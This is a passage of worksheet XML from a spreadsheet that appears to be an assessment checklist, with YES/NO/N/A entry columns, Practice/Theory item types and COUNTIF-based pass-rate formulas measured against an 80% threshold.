      <c r="L124" s="80"/>
      <c r="M124" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="125" ht="16.5" customHeight="1" spans="2:13">
      <c r="B125" s="45" t="s">
        <v>273</v>
      </c>
      <c r="C125" s="61"/>
      <c r="D125" s="125" t="s">
        <v>251</v>
      </c>
      <c r="E125" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F125" s="110" t="s">
        <v>274</v>
      </c>
      <c r="G125" s="80"/>
      <c r="H125" s="79"/>
      <c r="I125" s="80"/>
      <c r="J125" s="80"/>
      <c r="K125" s="80"/>
      <c r="L125" s="80"/>
      <c r="M125" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="126" ht="16.5" customHeight="1" spans="2:13">
      <c r="B126" s="45" t="s">
        <v>275</v>
      </c>
      <c r="C126" s="61"/>
      <c r="D126" s="125" t="s">
        <v>251</v>
      </c>
      <c r="E126" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F126" s="110" t="s">
        <v>276</v>
      </c>
      <c r="G126" s="80"/>
      <c r="H126" s="79"/>
      <c r="I126" s="80"/>
      <c r="J126" s="80"/>
      <c r="K126" s="80"/>
      <c r="L126" s="80"/>
      <c r="M126" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="127" ht="16.5" customHeight="1" spans="2:13">
      <c r="B127" s="45" t="s">
        <v>277</v>
      </c>
      <c r="C127" s="61"/>
      <c r="D127" s="125" t="s">
        <v>251</v>
      </c>
      <c r="E127" s="109" t="s">
        <v>23</v>
      </c>
      <c r="F127" s="110" t="s">
        <v>278</v>
      </c>
      <c r="G127" s="80"/>
      <c r="H127" s="79"/>
      <c r="I127" s="80"/>
      <c r="J127" s="80"/>
      <c r="K127" s="80"/>
      <c r="L127" s="80"/>
      <c r="M127" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="128" ht="16.5" customHeight="1" spans="2:13">
      <c r="B128" s="45" t="s">
        <v>279</v>
      </c>
      <c r="C128" s="61"/>
      <c r="D128" s="125" t="s">
        <v>251</v>
      </c>
      <c r="E128" s="109" t="s">
        <v>23</v>
      </c>
      <c r="F128" s="110" t="s">
        <v>280</v>
      </c>
      <c r="G128" s="80"/>
      <c r="H128" s="79"/>
      <c r="I128" s="80"/>
      <c r="J128" s="80"/>
      <c r="K128" s="80"/>
      <c r="L128" s="80"/>
      <c r="M128" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="129" ht="16.5" customHeight="1" spans="2:13">
      <c r="B129" s="45" t="s">
        <v>281</v>
      </c>
      <c r="C129" s="61"/>
      <c r="D129" s="125" t="s">
        <v>251</v>
      </c>
      <c r="E129" s="109" t="s">
        <v>23</v>
      </c>
      <c r="F129" s="110" t="s">
        <v>282</v>
      </c>
      <c r="G129" s="80"/>
      <c r="H129" s="79"/>
      <c r="I129" s="80"/>
      <c r="J129" s="80"/>
      <c r="K129" s="80"/>
      <c r="L129" s="80"/>
      <c r="M129" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="130" ht="16.5" customHeight="1" spans="2:13">
      <c r="B130" s="45" t="s">
        <v>283</v>
      </c>
      <c r="C130" s="61"/>
      <c r="D130" s="125" t="s">
        <v>251</v>
      </c>
      <c r="E130" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F130" s="110" t="s">
        <v>284</v>
      </c>
      <c r="G130" s="80"/>
      <c r="H130" s="79"/>
      <c r="I130" s="80"/>
      <c r="J130" s="80"/>
      <c r="K130" s="80"/>
      <c r="L130" s="80"/>
      <c r="M130" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="131" ht="16.5" customHeight="1" spans="2:13">
      <c r="B131" s="45" t="s">
        <v>285</v>
      </c>
      <c r="C131" s="61"/>
      <c r="D131" s="125" t="s">
        <v>251</v>
      </c>
      <c r="E131" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F131" s="110" t="s">
        <v>286</v>
      </c>
      <c r="G131" s="80"/>
      <c r="H131" s="79"/>
      <c r="I131" s="80"/>
      <c r="J131" s="80"/>
      <c r="K131" s="80"/>
      <c r="L131" s="80"/>
      <c r="M131" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="132" ht="16.5" customHeight="1" spans="2:13">
      <c r="B132" s="45" t="s">
        <v>287</v>
      </c>
      <c r="C132" s="61"/>
      <c r="D132" s="125" t="s">
        <v>251</v>
      </c>
      <c r="E132" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F132" s="110" t="s">
        <v>288</v>
      </c>
      <c r="G132" s="80"/>
      <c r="H132" s="79"/>
      <c r="I132" s="80"/>
      <c r="J132" s="80"/>
      <c r="K132" s="80"/>
      <c r="L132" s="80"/>
      <c r="M132" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="133" ht="16.5" customHeight="1" spans="2:13">
      <c r="B133" s="45" t="s">
        <v>289</v>
      </c>
      <c r="C133" s="61"/>
      <c r="D133" s="125" t="s">
        <v>251</v>
      </c>
      <c r="E133" s="109" t="s">
        <v>23</v>
      </c>
      <c r="F133" s="110" t="s">
        <v>290</v>
      </c>
      <c r="G133" s="80"/>
      <c r="H133" s="79"/>
      <c r="I133" s="80"/>
      <c r="J133" s="80"/>
      <c r="K133" s="80"/>
      <c r="L133" s="80"/>
      <c r="M133" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="134" ht="16.5" customHeight="1" spans="2:13">
      <c r="B134" s="62" t="s">
        <v>291</v>
      </c>
      <c r="C134" s="66"/>
      <c r="D134" s="126" t="s">
        <v>251</v>
      </c>
      <c r="E134" s="111" t="s">
        <v>17</v>
      </c>
      <c r="F134" s="112" t="s">
        <v>292</v>
      </c>
      <c r="G134" s="114"/>
      <c r="H134" s="113"/>
      <c r="I134" s="114"/>
      <c r="J134" s="114"/>
      <c r="K134" s="114"/>
      <c r="L134" s="114"/>
      <c r="M134" s="114" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="135" ht="16.5" customHeight="1" spans="2:13">
      <c r="B135" s="39" t="s">
        <v>293</v>
      </c>
      <c r="C135" s="58"/>
      <c r="D135" s="124" t="s">
        <v>294</v>
      </c>
      <c r="E135" s="105"/>
      <c r="F135" s="106"/>
      <c r="G135" s="108"/>
      <c r="H135" s="107"/>
      <c r="I135" s="108"/>
      <c r="J135" s="108"/>
      <c r="K135" s="108"/>
      <c r="L135" s="108"/>
      <c r="M135" s="108"/>
    </row>
    <row r="136" ht="16.5" customHeight="1" spans="2:13">
      <c r="B136" s="45" t="s">
        <v>295</v>
      </c>
      <c r="C136" s="61"/>
      <c r="D136" s="125" t="s">
        <v>294</v>
      </c>
      <c r="E136" s="109"/>
      <c r="F136" s="110"/>
      <c r="G136" s="80"/>
      <c r="H136" s="79"/>
      <c r="I136" s="80"/>
      <c r="J136" s="80"/>
      <c r="K136" s="80"/>
      <c r="L136" s="80"/>
      <c r="M136" s="80"/>
    </row>
    <row r="137" ht="16.5" customHeight="1" spans="2:13">
      <c r="B137" s="45" t="s">
        <v>296</v>
      </c>
      <c r="C137" s="61"/>
      <c r="D137" s="125" t="s">
        <v>294</v>
      </c>
      <c r="E137" s="109"/>
      <c r="F137" s="110"/>
      <c r="G137" s="80"/>
      <c r="H137" s="79"/>
      <c r="I137" s="80"/>
      <c r="J137" s="80"/>
      <c r="K137" s="80"/>
      <c r="L137" s="80"/>
      <c r="M137" s="80"/>
    </row>
    <row r="138" ht="16.5" customHeight="1" spans="2:13">
      <c r="B138" s="45" t="s">
        <v>297</v>
      </c>
      <c r="C138" s="61"/>
      <c r="D138" s="125" t="s">
        <v>294</v>
      </c>
      <c r="E138" s="109"/>
      <c r="F138" s="110"/>
      <c r="G138" s="80"/>
      <c r="H138" s="79"/>
      <c r="I138" s="80"/>
      <c r="J138" s="80"/>
      <c r="K138" s="80"/>
      <c r="L138" s="80"/>
      <c r="M138" s="80"/>
    </row>
    <row r="139" ht="16.5" customHeight="1" spans="2:13">
      <c r="B139" s="45" t="s">
        <v>298</v>
      </c>
      <c r="C139" s="61"/>
      <c r="D139" s="125" t="s">
        <v>294</v>
      </c>
      <c r="E139" s="109"/>
      <c r="F139" s="110"/>
      <c r="G139" s="80"/>
      <c r="H139" s="79"/>
      <c r="I139" s="80"/>
      <c r="J139" s="80"/>
      <c r="K139" s="80"/>
      <c r="L139" s="80"/>
      <c r="M139" s="80"/>
    </row>
    <row r="140" ht="16.5" customHeight="1" spans="2:13">
      <c r="B140" s="45" t="s">
        <v>299</v>
      </c>
      <c r="C140" s="61"/>
      <c r="D140" s="125" t="s">
        <v>294</v>
      </c>
      <c r="E140" s="109"/>
      <c r="F140" s="110"/>
      <c r="G140" s="80"/>
      <c r="H140" s="79"/>
      <c r="I140" s="80"/>
      <c r="J140" s="80"/>
      <c r="K140" s="80"/>
      <c r="L140" s="80"/>
      <c r="M140" s="80"/>
    </row>
    <row r="141" ht="16.5" customHeight="1" spans="2:13">
      <c r="B141" s="45" t="s">
        <v>300</v>
      </c>
      <c r="C141" s="61"/>
      <c r="D141" s="125" t="s">
        <v>294</v>
      </c>
      <c r="E141" s="109"/>
      <c r="F141" s="110"/>
      <c r="G141" s="80"/>
      <c r="H141" s="79"/>
      <c r="I141" s="80"/>
      <c r="J141" s="80"/>
      <c r="K141" s="80"/>
      <c r="L141" s="80"/>
      <c r="M141" s="80"/>
    </row>
    <row r="142" ht="16.5" customHeight="1" spans="2:13">
      <c r="B142" s="45" t="s">
        <v>301</v>
      </c>
      <c r="C142" s="61"/>
      <c r="D142" s="125" t="s">
        <v>294</v>
      </c>
      <c r="E142" s="109"/>
      <c r="F142" s="110"/>
      <c r="G142" s="80"/>
      <c r="H142" s="79"/>
      <c r="I142" s="80"/>
      <c r="J142" s="80"/>
      <c r="K142" s="80"/>
      <c r="L142" s="80"/>
      <c r="M142" s="80"/>
    </row>
    <row r="143" spans="2:13">
      <c r="B143" s="62"/>
      <c r="C143" s="114"/>
      <c r="D143" s="115"/>
      <c r="E143" s="111"/>
      <c r="F143" s="111"/>
      <c r="G143" s="114"/>
      <c r="H143" s="113"/>
      <c r="I143" s="114"/>
      <c r="J143" s="114"/>
      <c r="K143" s="114"/>
      <c r="L143" s="114"/>
      <c r="M143" s="114"/>
    </row>
    <row r="144" ht="16.5" customHeight="1" spans="2:13">
      <c r="B144" s="116"/>
      <c r="D144" s="117"/>
      <c r="H144" s="118"/>
    </row>
    <row r="145" ht="15" customHeight="1" spans="3:13">
      <c r="G145" s="119" t="s">
        <v>302</v>
      </c>
      <c r="H145" s="119"/>
      <c r="I145" s="87">
        <v>0.8</v>
      </c>
    </row>
    <row r="146" ht="15" customHeight="1" spans="3:13">
      <c r="E146" s="120" t="s">
        <v>303</v>
      </c>
      <c r="F146" s="117">
        <f>SUM(F147:F148)</f>
        <v>131</v>
      </c>
      <c r="G146" s="89" t="s">
        <v>304</v>
      </c>
      <c r="H146" s="91" t="str">
        <f>IF(AND(H147&gt;=$I$145,H148&gt;=$I$145,COUNTIFS($H$4:$H$142,"NO",$M$4:$M$142,"Mandatory")=0),"Passed","Failed")</f>
        <v>Failed</v>
      </c>
    </row>
    <row r="147" ht="15" customHeight="1" spans="3:13">
      <c r="C147" s="88"/>
      <c r="E147" s="120" t="s">
        <v>23</v>
      </c>
      <c r="F147" s="117">
        <f>COUNTIF($E$4:$E$134,E147)</f>
        <v>55</v>
      </c>
      <c r="G147" s="89" t="s">
        <v>23</v>
      </c>
      <c r="H147" s="101">
        <f>COUNTIFS($E$4:$E$143,G147,$H$4:$H$143,"YES")/F147*100%</f>
        <v>0</v>
      </c>
      <c r="I147" s="93">
        <f>I145*F147</f>
        <v>44</v>
      </c>
      <c r="J147" s="121" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="148" ht="15" customHeight="1" spans="3:13">
      <c r="C148" s="88"/>
      <c r="E148" s="120" t="s">
        <v>17</v>
      </c>
      <c r="F148" s="117">
        <f>COUNTIF($E$4:$E$134,E148)</f>
        <v>76</v>
      </c>
      <c r="G148" s="89" t="s">
        <v>17</v>
      </c>
      <c r="H148" s="101">
        <f>COUNTIFS($E$4:$E$143,G148,$H$4:$H$143,"YES")/F148*100%</f>
        <v>0</v>
      </c>
      <c r="I148" s="95">
        <f>I145*F148</f>
        <v>60.8</v>
      </c>
      <c r="J148" s="121"/>
    </row>
    <row r="149" ht="15" customHeight="1" spans="3:13">
      <c r="C149" s="88"/>
    </row>
    <row r="150" ht="15" customHeight="1" spans="3:13">
      <c r="G150" s="122" t="s">
        <v>306</v>
      </c>
      <c r="H150" s="122"/>
    </row>
    <row r="151" ht="15" customHeight="1" spans="3:13">
      <c r="D151" s="97" t="s">
        <v>307</v>
      </c>
      <c r="E151" s="120" t="s">
        <v>303</v>
      </c>
      <c r="F151" s="117">
        <f>SUM(F152:F153)</f>
        <v>0</v>
      </c>
      <c r="G151" s="89" t="s">
        <v>307</v>
      </c>
      <c r="H151" s="91" t="e">
        <f>IF(AND(H152&gt;=$I$145,H153&gt;=$I$145),"Passed","Failed")</f>
        <v>#DIV/0!</v>
      </c>
    </row>
    <row r="152" ht="15" customHeight="1" spans="3:13">
      <c r="D152" s="97"/>
      <c r="E152" s="120" t="s">
        <v>23</v>
      </c>
      <c r="F152" s="117">
        <f>COUNTIFS($E$4:$E$143,E152,$I$4:$I$143,"YES")+COUNTIFS($E$4:$E$143,E152,$I$4:$I$143,"NO")</f>
        <v>0</v>
      </c>
      <c r="G152" s="89" t="s">
        <v>23</v>
      </c>
      <c r="H152" s="101" t="e">
        <f>COUNTIFS($E$4:$E$143,G152,$I$4:$I$143,"YES")/F152*100%</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L152" s="98" t="s">
        <v>308</v>
      </c>
      <c r="M152" s="98"/>
    </row>
    <row r="153" ht="15" customHeight="1" spans="3:13">
      <c r="C153" s="102"/>
      <c r="D153" s="97"/>
      <c r="E153" s="120" t="s">
        <v>17</v>
      </c>
      <c r="F153" s="117">
        <f>COUNTIFS($E$4:$E$143,E153,$I$4:$I$143,"YES")+COUNTIFS($E$4:$E$143,E153,$I$4:$I$143,"NO")</f>
        <v>0</v>
      </c>
      <c r="G153" s="89" t="s">
        <v>17</v>
      </c>
      <c r="H153" s="101" t="e">
        <f>COUNTIFS($E$4:$E$143,G153,$I$4:$I$143,"YES")/F153*100%</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L153" s="99">
        <v>0.01</v>
      </c>
      <c r="M153" s="100" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="154" ht="15" customHeight="1" spans="3:13">
      <c r="C154" s="102"/>
      <c r="L154" s="99">
        <v>0.5</v>
      </c>
      <c r="M154" s="100" t="s">
        <v>310</v>
      </c>
    </row>
    <row r="155" ht="15" customHeight="1" spans="3:13">
      <c r="D155" s="97" t="s">
        <v>13</v>
      </c>
      <c r="E155" s="120" t="s">
        <v>303</v>
      </c>
      <c r="F155" s="117">
        <f>SUM(F156:F157)</f>
        <v>0</v>
      </c>
      <c r="G155" s="89" t="s">
        <v>13</v>
      </c>
      <c r="H155" s="91" t="e">
        <f>IF(AND(H156&gt;=$I$145,H157&gt;=$I$145),"Passed","Failed")</f>
        <v>#DIV/0!</v>
      </c>
      <c r="I155" s="89" t="s">
        <v>308</v>
      </c>
      <c r="L155" s="99">
        <v>0.6</v>
      </c>
      <c r="M155" s="100" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="156" ht="15" customHeight="1" spans="3:13">
      <c r="D156" s="97"/>
      <c r="E156" s="120" t="s">
        <v>23</v>
      </c>
      <c r="F156" s="117">
        <f>COUNTIFS($E$4:$E$143,E156,$J$4:$J$143,"YES")+COUNTIFS($E$4:$E$143,E156,$J$4:$J$143,"NO")</f>
        <v>0</v>
      </c>
      <c r="G156" s="89" t="s">
        <v>23</v>
      </c>
      <c r="H156" s="101" t="e">
        <f>COUNTIFS($E$4:$E$143,G156,$J$4:$J$143,"YES")/F156*100%</f>
        <v>#DIV/0!</v>
      </c>
      <c r="I156" s="88" t="e">
        <f>VLOOKUP(H156,$L$153:$M$157,2,TRUE)</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L156" s="99">
        <v>0.75</v>
      </c>
      <c r="M156" s="100" t="s">
        <v>312</v>
      </c>
    </row>
    <row r="157" ht="15" customHeight="1" spans="3:13">
      <c r="C157" s="102"/>
      <c r="D157" s="97"/>
      <c r="E157" s="120" t="s">
        <v>17</v>
      </c>
      <c r="F157" s="117">
        <f>COUNTIFS($E$4:$E$143,E157,$J$4:$J$143,"YES")+COUNTIFS($E$4:$E$143,E157,$J$4:$J$143,"NO")</f>
        <v>0</v>
      </c>
      <c r="G157" s="89" t="s">
        <v>17</v>
      </c>
      <c r="H157" s="101" t="e">
        <f>COUNTIFS($E$4:$E$143,G157,$J$4:$J$143,"YES")/F157*100%</f>
        <v>#DIV/0!</v>
      </c>
      <c r="I157" s="88" t="e">
        <f>VLOOKUP(H157,$L$153:$M$157,2,TRUE)</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L157" s="99">
        <v>0.9</v>
      </c>
      <c r="M157" s="100" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="158" ht="15" customHeight="1" spans="3:13">
      <c r="C158" s="102"/>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="B3:M148" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <mergeCells count="24">
    <mergeCell ref="I2:J2"/>
    <mergeCell ref="G145:H145"/>
    <mergeCell ref="G150:H150"/>
    <mergeCell ref="L152:M152"/>
    <mergeCell ref="B2:B3"/>
    <mergeCell ref="C2:C3"/>
    <mergeCell ref="C4:C10"/>
    <mergeCell ref="C11:C38"/>
    <mergeCell ref="C39:C68"/>
    <mergeCell ref="C69:C85"/>
    <mergeCell ref="C86:C108"/>
    <mergeCell ref="C109:C113"/>
    <mergeCell ref="C114:C134"/>
    <mergeCell ref="D2:D3"/>
    <mergeCell ref="D151:D153"/>
    <mergeCell ref="D155:D157"/>
    <mergeCell ref="E2:E3"/>
    <mergeCell ref="F2:F3"/>
    <mergeCell ref="G2:G3"/>
    <mergeCell ref="H2:H3"/>
    <mergeCell ref="J147:J148"/>
    <mergeCell ref="K2:K3"/>
    <mergeCell ref="L2:L3"/>
    <mergeCell ref="M2:M3"/>
  </mergeCells>
  <conditionalFormatting sqref="H146">
    <cfRule type="cellIs" dxfId="0" priority="2" operator="equal">
      <formula>"Passed"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="6" operator="equal">
      <formula>"Failed"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H151">
    <cfRule type="cellIs" dxfId="0" priority="3" operator="equal">
      <formula>"Passed"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="5" operator="equal">
      <formula>"Failed"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H155">
    <cfRule type="cellIs" dxfId="0" priority="1" operator="equal">
      <formula>"Passed"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="4" operator="equal">
      <formula>"Failed"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="3">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="H144:K144 H4:J143">
      <formula1>"YES, NO, N/A"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="E4:E144">
      <formula1>"Practice, Theory"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="M4:M144">
      <formula1>"Mandatory"</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5"/>
  <sheetViews>
    <sheetView showGridLines="0" zoomScale="98" zoomScaleNormal="98" workbookViewId="0">
      <pane xSplit="6" ySplit="3" topLeftCell="G146" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="F31" sqref="F31"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.11111111111111" defaultRowHeight="13.8"/>
  <cols>
    <col min="1" max="1" width="1.11111111111111" style="30" customWidth="1"/>
    <col min="2" max="2" width="6.33333333333333" style="30" customWidth="1"/>
    <col min="3" max="3" width="28" style="30" customWidth="1"/>
    <col min="4" max="4" width="12.1111111111111" style="30" customWidth="1"/>
    <col min="5" max="5" width="7.88888888888889" style="30" customWidth="1"/>
    <col min="6" max="6" width="54.1111111111111" style="30" customWidth="1"/>
    <col min="7" max="7" width="12.1111111111111" style="30" customWidth="1"/>
    <col min="8" max="10" width="7.33333333333333" style="30" customWidth="1"/>
    <col min="11" max="11" width="37.1111111111111" style="30" customWidth="1"/>
    <col min="12" max="16384" width="9.11111111111111" style="30"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:13">
      <c r="B1" s="31" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="2" s="28" customFormat="1" ht="22.5" customHeight="1" spans="2:13">
      <c r="B2" s="32" t="s">
        <v>1</v>
      </c>
      <c r="C2" s="32" t="s">
        <v>2</v>
      </c>
      <c r="D2" s="32" t="s">
        <v>3</v>
      </c>
      <c r="E2" s="32" t="s">
        <v>4</v>
      </c>
      <c r="F2" s="32" t="s">
        <v>5</v>
      </c>
      <c r="G2" s="18" t="s">
        <v>6</v>
      </c>
      <c r="H2" s="18" t="s">
        <v>7</v>
      </c>
      <c r="I2" s="33" t="s">
        <v>8</v>
      </c>
      <c r="J2" s="34"/>
      <c r="K2" s="18" t="s">
        <v>9</v>
      </c>
      <c r="L2" s="32" t="s">
        <v>10</v>
      </c>
      <c r="M2" s="32" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="3" s="28" customFormat="1" ht="22.5" customHeight="1" spans="2:13">
      <c r="B3" s="35"/>
      <c r="C3" s="36"/>
      <c r="D3" s="36"/>
      <c r="E3" s="36"/>
      <c r="F3" s="36"/>
      <c r="G3" s="37"/>
      <c r="H3" s="37"/>
      <c r="I3" s="38" t="s">
        <v>307</v>
      </c>
      <c r="J3" s="38" t="s">
        <v>13</v>
      </c>
      <c r="K3" s="37"/>
      <c r="L3" s="36"/>
      <c r="M3" s="36"/>
    </row>
    <row r="4" s="29" customFormat="1" ht="17.25" customHeight="1" spans="2:13">
      <c r="B4" s="39" t="s">
        <v>315</v>
      </c>
      <c r="C4" s="127" t="s">
        <v>316</v>
      </c>
      <c r="D4" s="128" t="s">
        <v>317</v>
      </c>
      <c r="E4" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F4" s="43" t="s">
        <v>318</v>
      </c>
      <c r="G4" s="43"/>
      <c r="H4" s="43"/>
      <c r="I4" s="43"/>
      <c r="J4" s="44"/>
      <c r="K4" s="44"/>
      <c r="L4" s="44"/>
      <c r="M4" s="44"/>
    </row>
    <row r="5" s="29" customFormat="1" ht="17.25" customHeight="1" spans="2:13">
      <c r="B5" s="45" t="s">
        <v>319</v>
      </c>
      <c r="C5" s="46"/>
      <c r="D5" s="128" t="s">
        <v>317</v>
      </c>
      <c r="E5" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F5" s="43" t="s">
        <v>320</v>
      </c>
      <c r="G5" s="43"/>
      <c r="H5" s="43"/>
      <c r="I5" s="43"/>
      <c r="J5" s="44"/>
      <c r="K5" s="44"/>
      <c r="L5" s="44"/>
      <c r="M5" s="44"/>
    </row>
    <row r="6" s="29" customFormat="1" ht="17.25" customHeight="1" spans="2:13">
      <c r="B6" s="45" t="s">
        <v>321</v>
      </c>
      <c r="C6" s="46"/>
      <c r="D6" s="128" t="s">
        <v>317</v>
      </c>
      <c r="E6" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F6" s="43" t="s">
        <v>322</v>
      </c>
      <c r="G6" s="43"/>
      <c r="H6" s="43"/>
      <c r="I6" s="43"/>
      <c r="J6" s="44"/>
      <c r="K6" s="44"/>
      <c r="L6" s="44"/>
      <c r="M6" s="44"/>
    </row>
    <row r="7" s="29" customFormat="1" ht="17.25" customHeight="1" spans="2:13">
      <c r="B7" s="45" t="s">
        <v>323</v>
      </c>
      <c r="C7" s="46"/>
      <c r="D7" s="128" t="s">
        <v>317</v>
      </c>
      <c r="E7" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F7" s="43" t="s">
        <v>324</v>
      </c>
      <c r="G7" s="43"/>
      <c r="H7" s="43"/>
      <c r="I7" s="43"/>
      <c r="J7" s="44"/>
      <c r="K7" s="44"/>
      <c r="L7" s="44"/>
      <c r="M7" s="44"/>
    </row>
    <row r="8" s="29" customFormat="1" ht="17.25" customHeight="1" spans="2:13">
      <c r="B8" s="45" t="s">
        <v>325</v>
      </c>
      <c r="C8" s="46"/>
      <c r="D8" s="128" t="s">
        <v>317</v>
      </c>
      <c r="E8" s="42" t="s">
        <v>23</v>
      </c>
      <c r="F8" s="43" t="s">
        <v>326</v>
      </c>
      <c r="G8" s="43"/>
      <c r="H8" s="43"/>
      <c r="I8" s="43"/>
      <c r="J8" s="44"/>
      <c r="K8" s="44"/>
      <c r="L8" s="44"/>
      <c r="M8" s="44"/>
    </row>
    <row r="9" s="29" customFormat="1" ht="17.25" customHeight="1" spans="2:13">
      <c r="B9" s="45" t="s">
        <v>327</v>
      </c>
      <c r="C9" s="46"/>
      <c r="D9" s="128" t="s">
        <v>317</v>
      </c>
      <c r="E9" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F9" s="43" t="s">
        <v>328</v>
      </c>
      <c r="G9" s="43"/>
      <c r="H9" s="43"/>
      <c r="I9" s="43"/>
      <c r="J9" s="44"/>
      <c r="K9" s="44"/>
      <c r="L9" s="44"/>
      <c r="M9" s="44"/>
    </row>
    <row r="10" s="29" customFormat="1" ht="17.25" customHeight="1" spans="2:13">
      <c r="B10" s="45" t="s">
        <v>329</v>
      </c>
      <c r="C10" s="46"/>
      <c r="D10" s="128" t="s">
        <v>317</v>
      </c>
      <c r="E10" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F10" s="43" t="s">
        <v>330</v>
      </c>
      <c r="G10" s="43"/>
      <c r="H10" s="43"/>
      <c r="I10" s="43"/>
      <c r="J10" s="44"/>
      <c r="K10" s="44"/>
      <c r="L10" s="44"/>
      <c r="M10" s="44"/>
    </row>
    <row r="11" s="29" customFormat="1" ht="17.25" customHeight="1" spans="2:13">
      <c r="B11" s="45" t="s">
        <v>331</v>
      </c>
      <c r="C11" s="47"/>
      <c r="D11" s="129" t="s">
        <v>317</v>
      </c>
      <c r="E11" s="49" t="s">
        <v>17</v>
      </c>
      <c r="F11" s="50" t="s">
        <v>332</v>
      </c>
      <c r="G11" s="50"/>
      <c r="H11" s="50"/>
      <c r="I11" s="50"/>
      <c r="J11" s="48"/>
      <c r="K11" s="48"/>
      <c r="L11" s="48"/>
      <c r="M11" s="48"/>
    </row>
    <row r="12" s="29" customFormat="1" ht="17.25" customHeight="1" spans="2:13">
      <c r="B12" s="45" t="s">
        <v>333</v>
      </c>
      <c r="C12" s="130" t="s">
        <v>334</v>
      </c>
      <c r="D12" s="131" t="s">
        <v>335</v>
      </c>
      <c r="E12" s="52" t="s">
        <v>17</v>
      </c>
      <c r="F12" s="53" t="s">
        <v>336</v>
      </c>
      <c r="G12" s="53"/>
      <c r="H12" s="53"/>
      <c r="I12" s="53"/>
      <c r="J12" s="54"/>
      <c r="K12" s="54"/>
      <c r="L12" s="54"/>
      <c r="M12" s="54"/>
    </row>
    <row r="13" s="29" customFormat="1" ht="26.25" customHeight="1" spans="2:13">
      <c r="B13" s="45" t="s">
        <v>337</v>
      </c>
      <c r="C13" s="46"/>
      <c r="D13" s="132" t="s">
        <v>335</v>
      </c>
      <c r="E13" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F13" s="43" t="s">
        <v>338</v>
      </c>
      <c r="G13" s="43"/>
      <c r="H13" s="43"/>
      <c r="I13" s="43"/>
      <c r="J13" s="44"/>
      <c r="K13" s="44"/>
      <c r="L13" s="44"/>
      <c r="M13" s="44"/>
    </row>
    <row r="14" s="29" customFormat="1" ht="27.6" spans="2:13">
      <c r="B14" s="45" t="s">
        <v>339</v>
      </c>
      <c r="C14" s="46"/>
      <c r="D14" s="132" t="s">
        <v>335</v>
      </c>
      <c r="E14" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F14" s="43" t="s">
        <v>340</v>
      </c>
      <c r="G14" s="43"/>
      <c r="H14" s="43"/>
      <c r="I14" s="43"/>
      <c r="J14" s="44"/>
      <c r="K14" s="44"/>
      <c r="L14" s="44"/>
      <c r="M14" s="44"/>
    </row>
    <row r="15" s="29" customFormat="1" ht="15" customHeight="1" spans="2:13">
      <c r="B15" s="45" t="s">
        <v>341</v>
      </c>
      <c r="C15" s="46"/>
      <c r="D15" s="132" t="s">
        <v>335</v>
      </c>
      <c r="E15" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F15" s="43" t="s">
        <v>342</v>
      </c>
      <c r="G15" s="43"/>
      <c r="H15" s="43"/>
      <c r="I15" s="43"/>
      <c r="J15" s="44"/>
      <c r="K15" s="44"/>
      <c r="L15" s="44"/>
      <c r="M15" s="44"/>
    </row>
    <row r="16" s="29" customFormat="1" ht="17.25" customHeight="1" spans="2:13">
      <c r="B16" s="45" t="s">
        <v>343</v>
      </c>
      <c r="C16" s="46"/>
      <c r="D16" s="132" t="s">
        <v>335</v>
      </c>
      <c r="E16" s="42" t="s">
        <v>17</v>
      </c>
      <c r="F16" s="43" t="s">
        <v>344</v>
      </c>
      <c r="G16" s="43"/>
      <c r="H16" s="43"/>
      <c r="I16" s="43"/>
      <c r="J16" s="44"/>
      <c r="K16" s="44"/>
      <c r="L16" s="44"/>
      <c r="M16" s="44"/>
    </row>
